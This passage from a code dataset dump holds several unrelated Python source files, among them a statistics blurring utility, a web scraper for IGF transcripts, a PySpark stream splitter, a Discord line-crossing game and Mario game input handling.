'Y':\n plt.scatter(se_array[y_km ==i,0][0], se_array[y_km == i,1][0], s=100)\n tempdf = pd.DataFrame(np.array(key_phrase)[[y_km == i,0][0]])\n tempdf.columns=['phrase']\n tempdf['cluster_name']=i\n fulldf = fulldf.append(tempdf)\n if create_plot == 'Y':\n plt.legend(range(0 , n_clusters), loc='center left', bbox_to_anchor=(1, 0.5))\n\n return fulldf\n","repo_name":"katiestuart/Keyword_Extraction","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35453135768","text":"from __future__ import unicode_literals\n\nimport numpy as np\n\n\ndef sample_linear_density(nsamp, x0, w, y0, y1):\n '''\n Input:\n nsamp - number of samples\n x0 - left boundary\n w - interval length\n y0 - density at left boundary\n y1 - density at right boundary\n '''\n m = y0\n k = y1-y0\n u = np.random.rand(nsamp)\n if k != 0:\n q = m/k\n return (-q + np.sign(q)*np.sqrt(q**2+(1+2*q)*u))*w + x0\n return u*w + x0\n\n\ndef evenly_spaced_linear_density(nsamp, x0, w, y0, y1):\n '''\n Input:\n nsamp - number of samples\n x0 - left boundary\n w - interval length\n y0 - density at left boundary\n y1 - density at right boundary\n '''\n m = y0\n k = y1-y0\n u = np.linspace(0, 1, nsamp, 
endpoint=False)\n    if k != 0:\n        q = m/k\n        return (-q + np.sign(q)*np.sqrt(q**2+(1+2*q)*u))*w + x0\n    return u*w + x0\n\n\ndef fp_blurring(data, w, even_spaced=False):\n    '''\n    Blurs data using the frequency polygon. Data is assumed to\n    be binned with bin width w. Purpose of blurring is to counter\n    effect of truncation. When even_spaced is True, the blurred data\n    is put in a deterministic way according to the density, when\n    False it is sampled from the density.\n\n    Ref: Minnotte (1997): Nonparametric Testing of Existence of Modes.\n\n    Input:\n    data - data set (one-dimensional)\n    w - bin width\n\n    '''\n    y, x = np.histogram(data, bins=np.arange(min(data)-0.5*w, max(data)+1.5*w, w))\n    y_count = np.hstack([[0], y, [0]])\n    x_fp = np.zeros(2*len(x)-1)\n    x_fp[0::2] = x\n    x_fp[1::2] = (x[1:]+x[:-1])/2\n    y_fp = np.zeros(2*len(x)-1)\n    y_fp[1::2] = y\n    y_fp[::2] = (y_count[1:]+y_count[:-1])*1./2\n\n    n_fp = np.zeros(2*len(y), dtype=int)  # np.int was removed in NumPy 1.24; use builtin int\n    p_left = (y_count[:-2] + 3*y_count[1:-1])*1./(y_count[:-2] + 6*y_count[1:-1] + y_count[2:])\n    p_left[np.isnan(p_left)] = 0\n    if not even_spaced:\n        n_fp[0::2] = np.random.binomial(y, p_left)\n    else:\n        n_fp[0::2] = np.round(y*p_left)\n    n_fp[1::2] = y - n_fp[0::2]\n    data_fp = []\n    for n, x0, y0, y1 in zip(n_fp, x_fp[:-1], y_fp[:-1], y_fp[1:]):\n        if not even_spaced:\n            data_fp.append(sample_linear_density(n, x0, w*0.5, y0, y1))\n        else:\n            data_fp.append(evenly_spaced_linear_density(n, x0, w*0.5, y0, y1))\n    data_blurred = data.copy().astype(float)  # np.float was removed in NumPy 1.24\n    for i, (x0, x1) in enumerate(zip(x[:-1], x[1:])):\n        ind = (data >= x0)*(data < x1)\n        if len(ind) > 0:\n            data_blurred[ind] = np.hstack(data_fp[(2*i):(2*i+2)])\n    return data_blurred\n","repo_name":"kjohnsson/modality","sub_path":"modality/util/frequency_polygon_blurring.py","file_name":"frequency_polygon_blurring.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"21467785419","text":"\n\nimport numbers\nERROR_MESSAGES = [\"argument count error\", \"argument type error\"]\n\n\ndef row_summ(*args):\n    if(len(args) != 1):\n        print(\"check the input data - wrong number of arguments!\")\n        return ERROR_MESSAGES[0]\n    if(not isinstance(args[0], numbers.Number)):\n        print(\"check the input data - the argument is not a number\")\n        return ERROR_MESSAGES[1]\n    row_counter = args[0]\n    if((row_counter % 1) != 0):\n        print(\"check the input arguments - the argument is not an integer\")\n        return ERROR_MESSAGES[1]\n    rt_value = 0\n    for n in range(int(row_counter)):\n        rt_value += (2*n+1)\n    print(F\"function result - {rt_value}\")\n    return rt_value\n","repo_name":"pohaha/programming_technologies_4_semester","sub_path":"LABORATORIES/pt_lab_3/LAB3_VAR6.py","file_name":"LAB3_VAR6.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"758578171","text":"from cachebrowser.network import ServerRack\nfrom settings import settings\nfrom daemon import Daemon\nfrom gevent import monkey\nimport argparse\nimport logging\nimport sys\nimport gevent\nimport cli\nimport proxy\n\nimport api\nimport models\nimport http\n\n\ndef parse_arguments():\n    parser = argparse.ArgumentParser(description=\"CacheBrowser\")\n    parser.add_argument('-d', '-daemon', action='store_true', dest='daemon', help=\"run in daemon mode\")\n    parser.add_argument('-s', '-socket', dest='socket', help=\"cachebrowser 
socket\")\n parser.add_argument('command', nargs='*', default=None, help='A cachebrowser command to execute and exit')\n args = parser.parse_args()\n settings.update_from_args(vars(args))\n\n\ndef init_logging():\n root = logging.getLogger()\n root.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(message)s')\n ch.setFormatter(formatter)\n root.addHandler(ch)\n\n\ndef run_cachebrowser():\n logging.info(\"Cachebrowser running...\")\n logging.debug(\"Waiting for connections...\")\n\n monkey.patch_all()\n\n rack = ServerRack()\n rack.add_server(port=5100, handler=cli.CLIHandler)\n rack.add_server(port=5200, handler=api.APIHandler)\n rack.add_server(port=8080, handler=proxy.ProxyConnection)\n rack.add_server(port=9000, handler=http.HttpConnection)\n # looper.register_server(port=5002, handler=proxy.handle_connection)\n # looper.register_server(port=9000, handler=http.handle_connection)\n # looper.start()\n\n rack.start_all()\n\n gevent.wait()\n\n\ndef run_command(command):\n class InlineCLIHandler(cli.CLIHandler):\n def __init__(self):\n super(InlineCLIHandler, self).__init__(None)\n self.send = sys.stdout.write\n\n handler = InlineCLIHandler()\n handler.handle_command(*command)\n\n\ndef main():\n parse_arguments()\n init_logging()\n models.initialize_database(settings['database'])\n\n command = settings.get('command', None)\n if command:\n run_command(command)\n return\n\n if settings.get('daemon', False):\n daemon = Daemon('/tmp/cachebrowser.pid', run_cachebrowser)\n daemon.start()\n else:\n run_cachebrowser()\n\nif __name__ == '__main__':\n main()","repo_name":"hjmj/cachebrowser","sub_path":"cachebrowser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"30871008514","text":"import sqlite3\nimport os\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n\n# The file directory to put the database in\nFILE_DIR = '/Users/nasif/Desktop/Mine/Workspace/vs_workspace/IGF-Data-Mining/'\n# The global variable that says the script which year of transcripts to add to the database\nTRANSCRIPT_YEAR = 2012\n# The global indexes that needs to be changed to reflect the current transcript year\n# Lets the script know where the transcript only links start and end.\nBEGIN_URL = 'http://www.intgovforum.org/cms/IGF-OpeningSession-301006.txt'\nEND_URL = 'http://www.intgovforum.org/cms/IGF-Closing%20Ceremony.txt'\n\n# Connect to the database and initialize the cursor\nconnection = sqlite3.connect(FILE_DIR + \"TranscriptsIGF.db\")\ncursor = connection.cursor()\n\n# Create the TABLE for the database and commit the changes\nsql_command = \"\"\"CREATE TABLE IF NOT EXISTS Transcripts (\n Year INTEGER,\n Panel_Name TEXT,\n Content TEXT,\n URL TEXT,\n Date_Accessed TEXT\n);\"\"\"\ncursor.execute (sql_command)\nconnection.commit()\n\n# send a GET request, pose as a Mozilla Firefox agent\nurl = 'http://www.intgovforum.org/multilingual/content/first-igf-meeting-athens-greece'\nheaders={'User-Agent': 'Mozilla/5.0'}\nr = requests.get(url, headers=headers)\nprint (url)\nprint (headers)\nprint (\"Getting the urls for transcripts of the year \" + str(TRANSCRIPT_YEAR) + \"...\")\nhtml = r.text\n\n# convert html into BS object\nsoup = BeautifulSoup(html, 'html.parser')\nhrefs = soup.find_all('a')\n\n# get all the links from the main page into a list\nurl_list = []\nurl_first_half = '' # http://www.intgovforum.org\nfor link 
in hrefs: \n\turl_second_half = link.get('href')\n\turl_list.append(url_first_half + str(url_second_half))\n\n# Select links that are transcript related and discard all the others\nbegin = url_first_half + BEGIN_URL\nend = url_first_half + END_URL\nbegin_index = url_list.index(begin)\nend_index = url_list.index(end)\nurl_list = url_list[begin_index : end_index + 1] # List now only has transcript urls\n\nprint (\"Fetched all the URLs successfully.\")\nprint (\"Starting to add everything to the database.\")\n\n# Gather all the appropriate column information from the transcript file directory to add to the database\nlist_of_files = os.listdir(FILE_DIR + \"/Transcripts_\" + str(TRANSCRIPT_YEAR))\n\nprint (\"Number of transcripts in folder \" + str(len(list_of_files)))\n\n# Index for the url_list\nindex = 0\nfor file in list_of_files:\n # Add the name of the file to be used as the name_of_panel later when it gets added to the database\n panel_name = file\n # Find the file in the directory so that it can be read\n input = FILE_DIR + \"/Transcripts_\" + str(TRANSCRIPT_YEAR) + \"/\" + file\n file_content = open(input, \"r\").read().replace(\"\\\\\", \"\") # Replace all the backslashes in the file\n # Get the url of the current transcript file\n file_url = url_list[index]\n index = index + 1\n # Find the last accessed (data modified) of the transcript file\n epoch = os.path.getmtime(input)\n # Convert epoch time (which is in seconds) into date and time\n date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(epoch))\n # Add the values into appropriate columns in the database\n cursor.execute(\"INSERT INTO Transcripts VALUES (?, ?, ?, ?, ?)\", (TRANSCRIPT_YEAR, panel_name, file_content, file_url, date))\n connection.commit() # Commit the changes\n print(\"Added \" + file + \" to the database\")\nprint(\"Successfully added everything to the database!\")\nconnection.close()","repo_name":"Nasiff/IGF-Data-Mining","sub_path":"sqldatabase.py","file_name":"sqldatabase.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3578446142","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType\n\nspark = SparkSession.builder.appName(\"EventsSplit\").getOrCreate()\n\nuserSchema = StructType().add(\"timestamp\", \"string\").add(\"visitorid\", \"string\").add(\"event\", \"string\").add(\"itemid\", \"string\").add(\"transactionid\", \"string\")\n\n\ndfCSV = spark.readStream.option(\"sep\", \",\").option(\"header\", \"false\").schema(userSchema).csv(\"file:///C:/tmp/text\")\n\ndfCSV.createOrReplaceTempView(\"events\")\n\ntransaction = spark.sql(\"select * from events where event='transaction'\")\nevents = spark.sql(\"select * from events where event<>'transaction'\")\n\nquery1 = transaction.writeStream.format(\"console\").start()\nquery2 = events.writeStream.format(\"console\").start()\n\nquery1.awaitTermination()\nquery2.awaitTermination()\n\n\n\n\n","repo_name":"Sherif-Embarak/Re-Vision","sub_path":"ETL_events_spark.py","file_name":"ETL_events_spark.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41632964226","text":"from typing import List, Optional\n\nfrom watchmen_meta.common import TupleService, TupleShaper\nfrom watchmen_model.admin import Space\nfrom watchmen_model.admin.space import SpaceFilter\nfrom watchmen_model.common 
import DataPage, Pageable, SpaceId, TenantId\nfrom watchmen_storage import ColumnNameLiteral, EntityCriteriaExpression, EntityCriteriaJoint, \\\n\tEntityCriteriaJointConjunction, EntityCriteriaOperator, EntityRow, EntityShaper\nfrom watchmen_utilities import ArrayHelper, is_not_blank\n\n\nclass SpaceShaper(EntityShaper):\n\t@staticmethod\n\tdef serialize_filter(space_filter: SpaceFilter) -> dict:\n\t\tif isinstance(space_filter, dict):\n\t\t\treturn space_filter\n\t\telse:\n\t\t\treturn space_filter.dict()\n\n\t@staticmethod\n\tdef serialize_filters(filters: Optional[List[SpaceFilter]]) -> Optional[list]:\n\t\tif filters is None:\n\t\t\treturn None\n\t\treturn ArrayHelper(filters).map(lambda x: SpaceShaper.serialize_filter(x)).to_list()\n\n\tdef serialize(self, space: Space) -> EntityRow:\n\t\treturn TupleShaper.serialize_tenant_based(space, {\n\t\t\t'space_id': space.spaceId,\n\t\t\t'name': space.name,\n\t\t\t'description': space.description,\n\t\t\t'topic_ids': space.topicIds,\n\t\t\t'group_ids': space.groupIds,\n\t\t\t'filters': SpaceShaper.serialize_filters(space.filters),\n\t\t})\n\n\tdef deserialize(self, row: EntityRow) -> Space:\n\t\t# noinspection PyTypeChecker\n\t\treturn TupleShaper.deserialize_tenant_based(row, Space(\n\t\t\tspaceId=row.get('space_id'),\n\t\t\tname=row.get('name'),\n\t\t\tdescription=row.get('description'),\n\t\t\ttopicIds=row.get('topic_ids'),\n\t\t\tgroupIds=row.get('group_ids'),\n\t\t\tfilters=row.get('filters')\n\t\t))\n\n\nSPACE_ENTITY_NAME = 'spaces'\nSPACE_ENTITY_SHAPER = SpaceShaper()\n\n\nclass SpaceService(TupleService):\n\tdef should_record_operation(self) -> bool:\n\t\treturn True\n\n\tdef get_entity_name(self) -> str:\n\t\treturn SPACE_ENTITY_NAME\n\n\tdef get_entity_shaper(self) -> EntityShaper:\n\t\treturn SPACE_ENTITY_SHAPER\n\n\tdef get_storable_id(self, storable: Space) -> SpaceId:\n\t\treturn storable.spaceId\n\n\tdef set_storable_id(self, storable: Space, storable_id: SpaceId) -> Space:\n\t\tstorable.spaceId = storable_id\n\t\treturn storable\n\n\tdef get_storable_id_column_name(self) -> str:\n\t\treturn 'space_id'\n\n\t# noinspection DuplicatedCode\n\tdef find_page_by_text(self, text: Optional[str], tenant_id: Optional[TenantId], pageable: Pageable) -> DataPage:\n\t\tcriteria = []\n\t\tif text is not None and len(text.strip()) != 0:\n\t\t\tcriteria.append(EntityCriteriaJoint(\n\t\t\t\tconjunction=EntityCriteriaJointConjunction.OR,\n\t\t\t\tchildren=[\n\t\t\t\t\tEntityCriteriaExpression(\n\t\t\t\t\t\tleft=ColumnNameLiteral(columnName='name'), operator=EntityCriteriaOperator.LIKE, right=text),\n\t\t\t\t\tEntityCriteriaExpression(\n\t\t\t\t\t\tleft=ColumnNameLiteral(columnName='description'), operator=EntityCriteriaOperator.LIKE,\n\t\t\t\t\t\tright=text)\n\t\t\t\t]\n\t\t\t))\n\t\tif tenant_id is not None and len(tenant_id.strip()) != 0:\n\t\t\tcriteria.append(EntityCriteriaExpression(left=ColumnNameLiteral(columnName='tenant_id'), right=tenant_id))\n\t\treturn self.storage.page(self.get_entity_pager(criteria=criteria, pageable=pageable))\n\n\t# noinspection DuplicatedCode\n\tdef find_by_name(self, text: Optional[str], tenant_id: Optional[TenantId]) -> List[Space]:\n\t\tcriteria = []\n\t\tif is_not_blank(text):\n\t\t\tcriteria.append(EntityCriteriaExpression(\n\t\t\t\tleft=ColumnNameLiteral(columnName='name'), operator=EntityCriteriaOperator.LIKE, right=text.strip()))\n\t\tif tenant_id is not None and len(tenant_id.strip()) != 0:\n\t\t\tcriteria.append(EntityCriteriaExpression(left=ColumnNameLiteral(columnName='tenant_id'), 
right=tenant_id))\n\t\t# noinspection PyTypeChecker\n\t\treturn self.storage.find(self.get_entity_finder(criteria=criteria))\n\n\tdef find_by_ids(self, space_ids: List[SpaceId], tenant_id: Optional[TenantId]) -> List[Space]:\n\t\tcriteria = [\n\t\t\tEntityCriteriaExpression(\n\t\t\t\tleft=ColumnNameLiteral(columnName='space_id'), operator=EntityCriteriaOperator.IN, right=space_ids)\n\t\t]\n\t\tif tenant_id is not None and len(tenant_id.strip()) != 0:\n\t\t\tcriteria.append(EntityCriteriaExpression(left=ColumnNameLiteral(columnName='tenant_id'), right=tenant_id))\n\t\t# noinspection PyTypeChecker\n\t\treturn self.storage.find(self.get_entity_finder(criteria))\n\n\t# noinspection DuplicatedCode\n\tdef find_all(self, tenant_id: Optional[TenantId]) -> List[Space]:\n\t\tcriteria = []\n\t\tif tenant_id is not None and len(tenant_id.strip()) != 0:\n\t\t\tcriteria.append(EntityCriteriaExpression(left=ColumnNameLiteral(columnName='tenant_id'), right=tenant_id))\n\t\t# noinspection PyTypeChecker\n\t\treturn self.storage.find(self.get_entity_finder(criteria=criteria))\n","repo_name":"Indexical-Metrics-Measure-Advisory/watchmen","sub_path":"packages/watchmen-meta/src/watchmen_meta/admin/space_service.py","file_name":"space_service.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"37929816082","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\n\n#with open('LastResult/AntPhase-1.txt') as f:\n# a = np.loadtxt(f, delimiter=';', usecols=(0,1,2), unpack=True)\n#\n#plt.plot(a[0],a[1], 'o',label='ok')\n#plt.plot(a[0],a[2], 'o',label='ok')\n#plt.show()\n\n\n\n#mesma coisa:\nwith open('LastResult/AntPhase-1.txt') as f:\n x,y = np.loadtxt(f, delimiter=';', usecols=(0,2), unpack=True)\n\n#plt.plot(x,y, 'ro',label='ok')\n#plt.show()\n\n#plt.plot([1,2,3,4],'ro')\n#plt.ylabel('some numbers')\n#plt.show()\n\n\ndef mean(numbers):\n return float(sum(numbers)) / max(len(numbers), 1)\n\n\ndef StartsAtI(a,I):\n result = []\n for i in range(len(a)):\n result.append(a[(i+I)%len(a)])\n return result\n\ndef InnerProd(a,b):\n sum = 0\n for i in range(len(a)):\n sum += a[i]*b[i]\n return sum\n\ndef Norm(a):\n return np.sqrt(InnerProd(a,a))\n\ndef Shorten(a,n):\n return [a[n*i] for i in range(int(len(a)/n))]\n\n\n\ndef correlation(x,y):\n# print(x)\n# print(y)\n\n result = []\n part1 = 0.\n part2 = 0.\n part3 = 0.\n mx = mean(x)\n my = mean(y)\n print('Computing correlation...')\n xmx = [k-mx for k in x]\n \n for i in range(1*len(x)):\n \n ymy = [k-my for k in StartsAtI(y,i)]\n \n result+=[InnerProd(xmx,ymy) / (Norm(xmx)*Norm(ymy))]\n\n return result\n\n\n\na=[1,2,10,3]\nb=[1,2,10,3]\n\n\na=range(20)\nb=StartsAtI(a,0)\n\n#print(a)\n#print(StartsAtI(a,0))\n#print(StartsAtI(a,1))\n#print(StartsAtI(a,2))\n#print(StartsAtI(a,3))\n#print(StartsAtI(a,18))\n\n\n\ncc = correlation(a,b)\n#print(correlation(a,b));\n#plt.plot(cc,'r')\n#plt.show()\n\n\nants = 10\nx=list(range(ants))\ny=list(range(ants))\n\ncoords = [posx, velx, posy, vely, angle] = [0,1,2,3,4]\n\n#dirname = 'LastResult'\ndirname = 'phero'\n\nfor i in range(ants):\n\n filename = dirname+'/AntPhase-'+str(i+1)+'.txt'\n with open(filename) as f:\n x[i],y[i] = np.loadtxt(f, delimiter=';', usecols=(posx,posy), unpack=True)\n# x[i] = np.loadtxt(f, delimiter=';', usecols=0, unpack=True)\n# y[i] = np.loadtxt(f, delimiter=';', usecols=1, unpack=True)\n\n#print(y[0])\n#print(x[0])\n#filename = 'LastResult/AntPhase-1.txt'\n#with 
open(filename) as f:\n# x1 = np.loadtxt(f, delimiter=';', usecols=(0,), unpack=True)\n#\n#filename = 'LastResult/AntPhase-2.txt'\n#with open(filename) as f:\n# x2 = np.loadtxt(f, delimiter=';', usecols=(0,), unpack=True)\n\n#cc=range(25)\n#cc=[0 for c in cc]\n#for i in range(5):\n# for j in range(5):\n\n#CorrPortraitx = list(range(ants))\n#CorrPortraity = list(range(ants))\n#CorrPortraitx, CorrPortraity = np.meshgrid(CorrPortraitx,CorrPortraity)\n#CorrPortraitz = 0. * CorrPortraitx # works bcause CorrPortraitx is now an array?...\n\n#floor = np.arange(ants*ants).reshape((ants,ants))\nfloor = np.array([[0.]*ants]*ants)\nCorrPortraitz = np.array([[0.]*ants]*ants)\nAnotherCorrPortraitz = np.array([[0.]*ants]*ants)\n\nfor i in range(len(CorrPortraitz)):\n CorrPortraitz[i][i]=1.\n AnotherCorrPortraitz[i][i]=1.\n\nnn = 10 # reduce size of list by nn for speed\nprint(range(ants))\nfor i in range(ants):\n for j in range(i+1,ants):\n print('(i,j) = (',i,',',j,')')\n xi = Shorten(x[i],nn)\n yi = Shorten(y[i],nn)\n xj = Shorten(x[j],nn)\n yj = Shorten(y[j],nn)\n cx = correlation(xi,xj)\n cy = correlation(yi,yj)\n maxcx = max(cx)\n maxcy = max(cy)\n CorrPortraitz[i][j] = maxcx*maxcy\n AnotherCorrPortraitz[i][j] = maxcy\n\nplt.figure(1)\nax = plt.subplot(121)\nplt.ylabel('maxcx*maxcy')\nax.imshow(CorrPortraitz)\n\nax = plt.subplot(122)\nplt.ylabel('only maxcy')\nax.imshow(AnotherCorrPortraitz)\n\nplt.show()\n\n\n#plt.show()\n\n\n\n\n","repo_name":"todisorder/AntsPython02","sub_path":"plot examples/AquiEstouATentarPlots.py","file_name":"AquiEstouATentarPlots.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13626265795","text":"import os\nfrom flask import Blueprint,request,jsonify\nfrom config import system as config\nfrom views import *\n#import views\n\nmod = Blueprint('alignment', __name__)\napp_dir = os.path.abspath(os.path.dirname(__file__))\n\n@mod.route('/mview_html/', methods = ['POST'])\ndef mview_html():\n\t\"get fmt,data,type and dump the viewer html\"\n\targ2def = {'fmt':'fasta','type':'dna'}\n\targs = {x:request.form.get(x,y) for x,y in arg2def.items()}\n\tif 'data' not in request.form:\n\t\treturn jsonify({'_msg':{'type':'error','des':'need args \"data\" in your submit'}})\n\telse:\n\t\targs['data']=request.form['data']\n\t\treturn jsonify({'html':mview().html_table(args)})\n","repo_name":"wyubin/dockers","sub_path":"nginx_flask_python2/uwsgi/project/python/app/alignment/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2693099804","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 13 15:12:09 2020\n\n@author: hjbec\n\"\"\"\n\n\nfrom urllib import request\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nimport urllib\n\n# connect to website and get list of all pdfs\nurl=\"https://www.ipcc.ch/reports/\"\nresponse = request.urlopen(url).read()\nsoup= BeautifulSoup(response, \"html.parser\") \nlinks = soup.find_all('a', href=re.compile(r'(.pdf)'))\n\n\n\n\n# clean the pdf link names\nurl_list = []\nfor el in links:\n if(el['href'].startswith('http')):\n url_list.append(el['href'])\n else:\n url_list.append(\"https://www.ipcc.ch/reports/\" + el['href'])\n\nprint(url_list)\n\n\n# download the pdfs to a specified location\nfor url in url_list:\n print(url)\n fullfilename = 
os.path.join('C:\\\\Users\\\\hjbec\\\\Documents\\\\work\\\\LancetProject', url.replace(\"https://www.ipcc.ch/reports/\", \"\"))\n    print(fullfilename)\n    request.urlretrieve(url, fullfilename)","repo_name":"hbechara/LancetProject","sub_path":"code/getpdfs.py","file_name":"getpdfs.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71135297081","text":"\"\"\"Exercise 4: Median of three values\r\nWrite a function that takes three numbers as parameters and returns the middle value of those parameters as the result. \r\nInclude a main program that reads three values from the user and displays their median.\r\nHint: The middle value is the middle of the three values when they are sorted in ascending order. \r\nIt can be found using if statements, or with a little mathematical creativity.\"\"\"\r\n\r\ndef mediana(*argv):\r\n    datos = list(argv)\r\n    datos.sort()\r\n    if len(datos)%2 != 0:\r\n        mediana = datos[len(datos)//2]\r\n    else:\r\n        mediana = datos[len(datos)//2]+datos[(len(datos)//2)-1]\r\n        mediana = mediana / 2  # average of the two middle values\r\n    return mediana\r\n\r\nvalor1 = int(input(\"Enter a value: \"))\r\nvalor2 = int(input(\"Enter another value: \"))\r\nvalor3 = int(input(\"Enter another value: \"))\r\n\r\nprint(\"The median of the values {},{},{} is {}\".format(valor1,valor2,valor3,mediana(valor1,valor2,valor3)))","repo_name":"enzostefani507/python-info","sub_path":"Funciones/Complementarios/Complementario4.py","file_name":"Complementario4.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1345490436","text":"def printgame(game):\n    def printrow(row):\n        out = \"\"\n        i = 0\n        while i < len(row):\n            if row[i] == 0:\n                out += \"\\\\| \"\n            else:\n                out += \"\\\\| \" * (row[i] - 1) + \"\\\\|\" + '~~'\n                i+= row[i] - 1\n            i += 1\n        return out\n    out = \"\"\n    for i in range(len(game)):\n        out += 'abcdefghijklmno'[i] + printrow(game[i]) + '\\n'\n    return out\n\nimport json\ndef run(msg, client):\n    \"\"\"The way to run kreski\\n\n    I don't know what kreski is but I don't care\"\"\"\n    if not msg.content.startswith('k!'):\n        return\n    n = client.db.get('kreskigames.txt',0)\n    args = msg.content.split(' ')[1:]\n    switch = {}\n    def case():\n        msg.reply('k!start @opponent to start a game\\nk!move (gameid) (move) to move')\n        return\n    switch[\"help\"] = case\n    def case():\n        nonlocal n\n        try:\n            args[1]\n        except IndexError:\n            args.append(4)\n        starting = [[0]]\n        for i in range(int(args[1]) - 1):\n            starting.append(json.loads(json.dumps(starting[i])))\n            starting[i].append(0)\n            starting[i].append(0)\n        client.db.settype('kreski',str(n)+'.json',[msg.author.id,args[0][2:-1],0,starting,starting,['1','1']]) #If I remember correctly it's the 5th time not semi-colon was used\n        n = f\"{int(n)+1}\"\n        client.db.set('kreskigames.txt',n)\n        msg.reply(f\"game started! 
id: {int(n)-1}\\n{printgame(starting)}\")\n        return\n    switch[\"start\"] = case\n    def case():\n        if len(args) < 2:\n            msg.reply(\"not enough arguments\")\n            return\n        if len(args[1]) < 3:\n            msg.reply('move is supposed to be (row)(start)(end)\\nfor example b12')\n            return\n        game = json.loads(client.db.gettype('kreski',args[0]+'.json'))\n        if msg.author.id != game[game[2]]:\n            msg.reply('not your turn!')\n            return\n        try:\n            x = 'abcdefghijklmno'.find(args[1][0])\n            y = int(args[1][1])\n            z = int(args[1][2])\n        except:\n            return\n        allowed = True\n        for i in game[3][x][y-1:z]:\n            if i != 0:\n                allowed = False\n        if allowed:\n            game[4] = json.loads(json.dumps(game[3]))\n            for i in range(y, z, 1):\n                game[3][x][i] = 1\n            game[3][x][y - 1] = z-y+1\n            game[2] = (game[2]+1)%2\n            client.db.settype('kreski',args[0]+'.json',game) #6th ?\n            cont = False\n            for x in game[3]:\n                for y in x:\n                    if not y:\n                        cont = True\n            if cont:\n                msg.reply(printgame(game[3]))\n            else:\n                msg.reply(f\"game ends, <@{game[(game[2]+1)%2]}> wins!\")\n        return\n    switch[\"move\"] = case\n    def case():\n        if (len(args)<1):\n            msg.reply('not enough arguments')\n            return\n        game = json.loads(client.db.gettype('kreski',args[0]+'.json'))\n        if msg.author.id != game[(game[2]+1)%2]:\n            msg.reply('not your turn!')\n            return\n        if game[5][(game[2]+1)%2] == \"0\":\n            msg.reply('you can only undo once')\n            return\n        game[3] = game[4]\n        game[2] = (game[2]+1)%2\n        game[5][game[2]] = \"0\"\n        client.db.settype('kreski',args[0]+'.json',game)\n    switch[\"undo\"] = case\n    del case\n    switch[msg.content.split(' ')[0][2:].lower()]()\n    del switch\n","repo_name":"guigui0246/kerfus-bot-but-in-python","sub_path":"features/5_games/kreski.py","file_name":"kreski.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32742008424","text":"import sys\n\nimport pygame\nfrom pygame.locals import *\n\n\ndef on_event(mario, level, second, game_time, settings):\n    \"\"\"Handles Pygame events.\"\"\"\n    for event in pygame.event.get():\n        if not mario.settings.level_over:\n            if event.type == second:\n                game_time.update()\n            if event.type == KEYDOWN:\n                on_key_down(event, mario, level, settings)\n            elif event.type == KEYUP:\n                on_key_up(event, mario)\n        if event.type == QUIT:\n            sys.exit()\n\n\ndef on_key_down(event, mario, level, settings):\n    \"\"\"Handles key presses.\"\"\"\n    if not mario.animating and not mario.hit and not settings.level_over and not mario.dead:\n        if mario.pipe_down or mario.pipe_up or mario.pipe_side:\n            return\n        if event.key == K_RIGHT and not mario.crouching:\n            mario.moving_right = True\n            mario.moving_left = False\n            if mario.underground:\n                mario.check_pipe_exit(level)\n        elif event.key == K_LEFT and not mario.crouching:\n            mario.moving_left = True\n            mario.moving_right = False\n        elif event.key == K_DOWN:\n            if not mario.pipe_down:\n                mario.crouching = True\n                mario.moving_left = False\n                mario.moving_right = False\n                mario.running = False\n                mario.is_scrolling = False\n                mario.check_pipe()\n        elif event.key == K_s:\n            if mario.moving_left or mario.moving_right:\n                mario.running = True\n        elif event.key == K_SPACE:\n            if mario.state == \"fire\":\n                mario.throw_fireball()\n        elif event.key == K_UP:\n            mario.jump()\n\n\ndef on_key_up(event, mario):\n    \"\"\"Handles key releases.\"\"\"\n    if event.key == K_RIGHT:\n        mario.moving_right = False\n        mario.is_scrolling = False\n    if event.key == K_LEFT:\n        mario.moving_left = False\n        mario.is_scrolling = False\n    if event.key == K_DOWN:\n        mario.crouching = False\n    if event.key == K_s:\n        mario.running = False\n\n\ndef 
